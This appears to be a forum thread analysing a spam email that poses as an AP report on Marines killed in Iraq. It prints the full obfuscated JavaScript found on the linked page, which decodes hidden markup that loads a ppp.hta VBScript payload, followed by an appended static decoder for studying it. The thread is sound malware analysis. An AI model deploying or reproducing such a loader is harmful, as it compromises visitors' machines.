The subject line was "Subject: 140 Marines Killed in Irraq Bombing" (sic)
>14 US Marines Killed in Iraq Bombing
>Guardian Unlimited
>
>By ROBERT H. REID. BAGHDAD, Iraq (AP) - 40 minutes ago.
>
>14 US Marines were killed when a huge bomb destroyed their lightly armored vehicle, urling it into the air in a giant fireball in the deadliest roadside bombing suffered by American forces in the Iraq war
>
>Read more... (linked to http://www.wckqp.vbnnews.com WHICH MIGHT BE A VIRUS OR SOMETHING)
Ah, but when I view the raw source of the message, I see this in the text/plain
MIME type section of it...
Hello,
he abandoned the notion of so insane an enterprise, deterred =
notguardianship. It was perhaps his one mistake. But the goodness ofAt =
the table sat a man of whom nothing was visible but the top ofThat is a =
matter between yourself and M. de Cussy, my General.His mind went back =
over the adventure of yesterday, if of yesterdayof France. Hagthorpe =
looked at Blood as he spoke. Blood noddedand depth of my genius.round =
Cape Tiburon, and thereafter, standing well out to sea, withrode =
oblivious of all others in the world that morning. He wassilence, at =
last, he held out his hand; and in silence BloodSpanish prisoners. But =
she contrived so to time her visits thatthing it had planned. But to =
correct the sentiment he evoked aAre you guilty or not guilty? snapped =
this peppery gentleman.in bitterness, it must be because that bitterness =
was anterior towomanhood as was the azalea among flowers. He hurried =
forth toMiss Bishop, seated at the cabin-table, looked at him steadily,
And then the HTML part begins.
The link itself (if you daren't go there) goes to a simple web site that has the text of a news article, though, like the email itself, it can't decide between 14 and 140 fatalities (CNN says 14). At the top of the page's code is this JavaScript that doesn't seem to do anything on my machine/browser (Mac/Safari 1.3)... Anyone know what it does?
<script>
var hr=location.href,st='',k='',s='',b='cgabbfbbgbcbbaibabcgccdfbcacfaceecdfbcacfbbcdbbcbbbbbfbafbbgbafbbbbbacficjhcjibbfbbbbaibbhbbgbabcfjbaibabbacbbgcficefcejceiceiceicfjbcfcgacehbbfbbgbcbbaibabcgccgachjcggchecgjcghciecdcbafbaacgbbcacfacdccjjbaicjhbbfbbfbafbaacgbcjjbaibbfbafbaacficjhbaacjicfgcfgceicjhcfecefbaacfgbacbaccefcejcejcjjbaccefcfhcfbcffcffcefceiceicjhcjhceiceicfbcjicffcjhcejcejcgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecghbbbbajbajcjhbbabaacdecdccigcgfchgcifcgjcgbcdecicbabbaicjhbbgbabbaacdcciebbbbbcbafcjjbbfcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecggbbhbbgbbgbbbbbacdecdccigcgfchgcifcgjcgbcdeciebabbcabbgcficdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecihbafbbabaabbbbbjcdecdccigcgfchgcifcgjcgbcdecdgbadbaibbbcjicjhbaicjfcjibaicjhbbabahcdecgccgabbccjhbbecjhbajcdcbbacjhbajbabcgbcdecidcjjbbebbbbaibaicjicjhbbebbfcdecdcbbicjhbaibbhbabcgbcdebbgbbebbhbabcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdechdbbgbabbajcejcdecdccigcgfchgcifcgjcgbcdecjjbbbbajbajcjhbbabaacfjbajbbfcefbafbbgbbfcfibafcjjbbjbaabafcjhbaicegcjjbaebajcficficehbafcjjbbjcjfbbbbbibabbbebbibafbabbbjcegbaebbgbajcdecgccgacehchjcggchecgjcghciecgccgabbfcjjbbebafbbcbbgcgcbcacfacegchcchccghbaibafcjjbahceacebcfjbbjbafbbabaabbbbbjcegbbbbbcbabbbababbbecegbacbbbcjjbbhbbfceacebcfjcgacehbbfcjjbbebafbbcbbgcgccgachjcggchecgjcghciecdcbafbaacgbbcacfbcdccjjbaicjhbbfbbfbafbaacgbcjjbaibbfbafbaacficjhbaacjicfgcfgceicjhcfecefbaacfgbacbaccefcejcejcjjbaccefcfhcfbcffcffcefceiceicjhcjhceiceicfbcjicffcjhcejcejcgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecghbbbbajbajcjhbbabaacdecdccigcgfchgcifcgjcgbcdecicbabbaicjhbbgbabbaacdcciebbbbbcbafcjjbbfcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecggbbhbbgbbgbbbbbacdecdccigcgfchgcifcgjcgbcdeciebabbcabbgcficdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecihbafbbabaabbbbbjcdecdccigcgfchgcifcgjcgbcdecdgbadbaibbbcjicjhbaicjfcjibaicjhbbabahcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdechdbbgbabbajcejcdecdccigcgfchgcifcgjcgbcdecjjbbbbajbajcjhbbabaacfjbagcjhbbicjhbbfcjjbbebafbbcbbgcfibaabbbcjjbbhbajb
abbbabbgcegbaibafbbabahbbfcjbceicjdcegbaebbebabbaccgbcdjcgjciicgjcghcgbceebajbbfbaebbgcjhceecdhcdccdccghchcchhcgbbafbabbbfbaecjhbbebabbaacegcjjbaebajcdcchachdchgcgjcgbcjhbbcbbccjfbafbbabbfbbgcjhbaibaicegbaebbgbajcdjcdhcfbcggbaabbbcjjbbhbajbabbbabbgcegbaibafbbabahbbfcjbceicjdcegcjjbaibafcjjbahceacebcfjcdecgccgacehchjcggchecgjcghciecgccgabbfcjjbbebafbbcbbgcgcbbfbabbbgciebafbajbabbbbbbhbbgceacdjbcacfbcegchcchccghbaibafcjjbahceacebcfjcdjceecejceiceiceicebcfjbbfbabbbgciebafbajbabbbbbbhbbgceacdjbbjbafbbabaabbbbbjcegcjjbaibbbbbfbabceacebcfjcdjceecejcfaceiceicebcfjcgacehbbfcjjbbebafbbcbbgcgc';
for(i=0;i<b.length;i++)
{
s+=b.slice(i,i+1).charCodeAt(0)-97;
};
for(j=0;j<String(s).length;j+=3)
{
k=parseInt(String(s).slice(j,j+3));
if(k>200){k-=200;}
st+=String.fromCharCode(k);
};
document.write(st.replace('%',hr.substring(0,hr.lastIndexOf('/')) +'/ppp.hta'));
</script>
Hmm... That code appears to just be a complex way of redirecting the browser to http colon slash slash www dot wckqp dot vbnnews dot com slash ppp dot hta, which houses a heap load of VBCode. (I tried pasting it in here but it whined the text field is too long.) So it is most certainly a hax or exploit or something.
Looks like there is some HTML code obfuscated in that long string, which is decrypted, has that URL inserted into it, and is then inserted into the page. I am too lazy to run that decryption code to see what exactly the code is, though.
http://isc.sans.org/diary.php?date=2005-08-04
The Internet Storm Center noticed this neat little browser-malware trick on the day >>1 was posted.
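Added example, not part of the thread: the decoding loop from the script posted above, rewritten as a static decoder that returns the hidden markup as a string instead of passing it to document.write. The names decodePayload, placeholderIndex and encodeSample are chosen here; the only input taken from the page is the first 21 letters of `b`, and the second input is a constructed harmless sample.

```javascript
// Static decoder for the script's a-j / three-digit scheme.
// It only returns strings; nothing is rendered or fetched.
function decodePayload(blob) {
  const letters = blob.replace(/\s+/g, ''); // tolerate line-wrapped copies
  if (!/^[a-j]*$/.test(letters)) {
    throw new Error('expected only the letters a-j');
  }
  let out = '';
  for (let i = 0; i < letters.length; i += 3) {
    // 'a'..'j' stand for the digits 0..9; three digits form one number.
    let k = 0;
    for (const ch of letters.slice(i, i + 3)) {
      k = k * 10 + (ch.charCodeAt(0) - 97);
    }
    if (k > 200) k -= 200; // same rule as the original: 260 becomes 60 ('<')
    out += String.fromCharCode(k);
  }
  return out;
}

// The original swaps the first '%' for "<page directory>/ppp.hta";
// this reports where that substitution would land.
function placeholderIndex(markup) {
  return markup.indexOf('%');
}

// Inverse of decodePayload, used only to build a constructed test input.
function encodeSample(text) {
  let blob = '';
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    const n = String(c < 100 ? c + 200 : c); // always three digits for ASCII
    for (const d of n) blob += String.fromCharCode(97 + Number(d));
  }
  return blob;
}

const PAGE_PREFIX = 'cgabbfbbgbcbbaibabcgc'; // first 21 letters of b, from the page
const SAMPLE = encodeSample('<a href="%">constructed</a>'); // constructed input
console.log(JSON.stringify(decodePayload(PAGE_PREFIX)));
console.log(JSON.stringify(decodePayload(SAMPLE)), placeholderIndex(decodePayload(SAMPLE)));
```

Pasting the full value of `b` into decodePayload shows the complete markup as inert text, with the `%` marking where the ppp.hta address is spliced in.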